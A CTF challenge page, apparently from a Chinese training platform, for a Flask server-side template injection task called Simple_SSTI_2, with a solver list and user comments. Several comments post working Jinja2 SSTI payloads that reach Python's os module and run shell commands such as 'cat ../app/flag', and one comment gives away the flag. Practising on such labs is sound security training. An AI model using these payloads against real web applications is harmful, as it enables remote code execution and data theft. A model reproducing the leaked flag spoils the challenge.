Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16188
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
白菜白又白 攻破了该题 25分钟前
igrazee 攻破了该题 4小时前
yangwen 攻破了该题 18小时前
ixin 攻破了该题 19小时前
66666ctfxr 攻破了该题 1天前
Zhengzanmei 攻破了该题 1天前
liang123456 攻破了该题 1天前
353866147 攻破了该题 2天前
out不慢 攻破了该题 3天前
sjjf 攻破了该题 5天前
所以flag在哪? 攻破了该题 7天前
18934929166 攻破了该题 7天前
zxcvbnmzhang 攻破了该题 7天前
辛笙 攻破了该题 10天前
caocao 攻破了该题 11天前
Hushhh 攻破了该题 11天前
Jazz888 攻破了该题 11天前
一世温华 攻破了该题 12天前
zzt1 攻破了该题 13天前
评论
SecI302 3年前
举报
寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可
⎝ZJJARY 3年前
举报
①{{[].__class__.__base__.__subclasses__()}}查看所有类,并找到warnings.catch_warnings类,逐个计数或者写脚本得到序号为177 ②{{[].__class__.__base__.__subclasses__()[177].__init__.__globals__['__builtins__']['__imp'+'ort__']('os
g0207l0706 3年前
举报
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
18270938076 3年前
举报
kali 进半天都没有进去啊
kangkangki 3年前
举报
flag{316fbc12e983db18c0584de9a1cbcee3}
PlusJia 3年前
举报
https://blog.csdn.net/weixin_43651049/article/details/123391624?ops_request_misc=&request_id=&biz_id=102&utm_term=Simple_SSTI_2&utm_medium=distribute.pc_search_result.none-task-blog-2~
gtg2619 3年前
举报
tplmap能出
easyCtf 3年前
举报
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
风灵丨玉秀 3年前
举报
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
15062206228 3年前
举报
学习flask ssti。参考https://blog.csdn.net/DonkeyMoon/article/details/109027966?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-109027966-blo